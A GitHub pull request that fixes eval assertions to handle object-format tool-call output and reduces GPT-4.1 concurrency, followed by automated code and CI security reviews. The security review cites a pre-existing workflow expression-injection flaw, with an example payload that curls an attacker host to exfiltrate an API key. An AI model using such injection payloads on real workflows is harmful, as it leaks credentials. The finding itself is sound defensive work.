fix: handle object output in eval assertions and reduce GPT-4.1 concurrency by stack72 · Pull Request #1090 · systeminit/swamp

stack72 · 2026-04-04T01:45:18Z

Summary

Fix eval assertions to handle both string and object output formats from promptfoo. Gemini returns tool calls as objects, not JSON strings, which caused all assertions to fail. The 36.1% pass rate was a false negative: routing was correct, but the assertions couldn't detect it.
Fix [object Object] in failure log output by serializing object responses before slicing
Reduce GPT-4.1 eval concurrency from 20 to 5 to avoid 429 rate limiting
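
For readers without the diff open, here is a rough sketch of the two assertion fixes described above. It is not the code from this PR: the ToolCall shape, the helper names (toToolCalls, calledTool, preview), and the tool name "skill_a" are all assumptions made for illustration, and the real promptfoo output shape may differ per provider.

```typescript
// Hypothetical tool-call shape; real provider output may carry other fields.
type ToolCall = { name?: string; function?: { name?: string } };

// Normalize provider output to a list of tool calls, whether it arrives
// as a JSON string or as an already-parsed object/array.
function toToolCalls(output: unknown): ToolCall[] {
  let value: unknown = output;
  if (typeof value === "string") {
    try {
      value = JSON.parse(value);
    } catch {
      return []; // plain text, not a tool call
    }
  }
  if (Array.isArray(value)) return value as ToolCall[];
  if (value !== null && typeof value === "object") return [value as ToolCall];
  return [];
}

// True when any tool call in the output names the expected tool.
function calledTool(output: unknown, expected: string): boolean {
  return toToolCalls(output).some(
    (call) => (call.function?.name ?? call.name) === expected,
  );
}

// Serialize before slicing so objects never render as "[object Object]".
function preview(output: unknown, max = 200): string {
  const text = typeof output === "string"
    ? output
    : JSON.stringify(output) ?? String(output);
  return text.slice(0, max);
}
```

With helpers like these, calledTool('[{"function":{"name":"skill_a"}}]', "skill_a") and calledTool([{ function: { name: "skill_a" } }], "skill_a") take the same path, so one assertion covers both output formats.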

Test Plan

deno fmt --check passes
deno lint passes
Re-run multi-model eval workflow to verify Gemini pass rate improves and GPT-4.1 avoids rate limits

🤖 Generated with Claude Code

…1 concurrency Promptfoo returns tool call output as objects (not JSON strings) for some providers like Gemini. The JavaScript assertions now handle both string and object output formats. Also reduces GPT-4.1 concurrency from 20 to 5 to avoid 429 rate limiting. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

github-actions

Code Review

Blocking Issues

None.

Suggestions

parseInt(args.concurrency) in scripts/eval_skill_triggers_promptfoo.ts:142 doesn't guard against NaN (e.g., --concurrency foo). A quick if (isNaN(concurrency)) check with an error message would be more robust, though this is an internal CI tool with a sensible default so it's non-blocking.
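
A minimal sketch of the suggested guard, assuming the flag arrives as an optional string. The function name parseConcurrency and its fallback parameter are hypothetical; the actual script's argument handling and default value are not shown in this thread.

```typescript
// Hypothetical helper: parse a --concurrency value, rejecting non-numeric
// or non-positive input instead of silently passing NaN downstream.
function parseConcurrency(raw: string | undefined, fallback: number): number {
  if (raw === undefined) return fallback;
  const value = Number.parseInt(raw, 10);
  if (Number.isNaN(value) || value < 1) {
    throw new Error(
      `--concurrency must be a positive integer, got "${raw}"`,
    );
  }
  return value;
}
```

Note that parseInt accepts a leading numeric prefix, so an input like "5abc" still parses as 5. A stricter check (for example a /^\d+$/ test before parsing) would be needed to reject that as well.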

Overall this is a clean, well-scoped fix. The assertion logic correctly handles both string and object output formats from different model providers, the [object Object] log fix is straightforward, and the per-model concurrency in the workflow matrix is a good approach to rate limit management.

github-actions

CI Security Review

Critical / High

None.

Medium

Pre-existing: Expression injection in multi-model-eval.yml:36-37 — ${{ github.event.inputs.models || 'all' }} is interpolated directly in a run: block. A repo collaborator could inject shell commands via the workflow_dispatch input (e.g., "; curl attacker.com/exfil?key=$ANTHROPIC_API_KEY #). This is pre-existing and NOT introduced by this PR, but worth noting. Fix: pass the input via an env: variable instead of inline interpolation.
denoland/setup-deno@v2 not SHA-pinned (multi-model-eval.yml:49) — Pre-existing. The Deno team is a trusted publisher, but SHA-pinning third-party actions is best practice for supply chain security.

Low

None.

Verdict

PASS — The changes in this PR are security-neutral. They add per-model concurrency to the matrix (hardcoded integer values, no injection risk) and fix eval assertion logic in TypeScript files that don't affect CI security posture. The two medium findings are pre-existing and not introduced by this diff.

github-actions bot approved these changes Apr 4, 2026


stack72 merged commit b0eb70c into main Apr 4, 2026
11 checks passed

stack72 deleted the fix/eval-assertion-compat branch April 4, 2026 01:52
